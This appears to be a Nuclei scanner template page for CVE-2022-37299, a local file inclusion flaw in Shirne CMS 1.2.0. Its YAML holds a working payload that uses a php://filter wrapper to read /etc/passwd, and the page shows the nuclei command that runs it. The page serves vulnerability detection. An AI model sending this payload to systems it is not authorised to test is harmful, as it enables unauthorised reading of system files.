Skip to content
Nuclei Templates

Shirne CMS 1.2.0 - Local File Inclusion

ID: CVE-2022-37299

Severity: medium

Author: pikpikcu

Tags: cve,cve2022,shirnecms,lfi,shirne_cms_project

Description

Section titled “Description”

Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php.

YAML Source

Section titled “YAML Source”
id: CVE-2022-37299


info:
  name: Shirne CMS 1.2.0 - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability.
  reference:
    - https://twitter.com/pikpikcu/status/1568316864690028544
    - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37299
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-37299
    cwe-id: CWE-22
    epss-score: 0.00663
    epss-percentile: 0.79609
    cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: shirne_cms_project
    product: shirne_cms
  tags: cve,cve2022,shirnecms,lfi,shirne_cms_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "cm9vd" # root in base64


      - type: word
        part: header
        words:
          - "image/png"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ee241db03ae70cec0d96b03616b40a1b137c0ea175860d595e472d99be7ee6db022100812f4354f264b9e56afcd2e17abd069e7dcf4f12ba6bf96f4a701e3e5ed8e3be:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-37299.yaml"

View on Github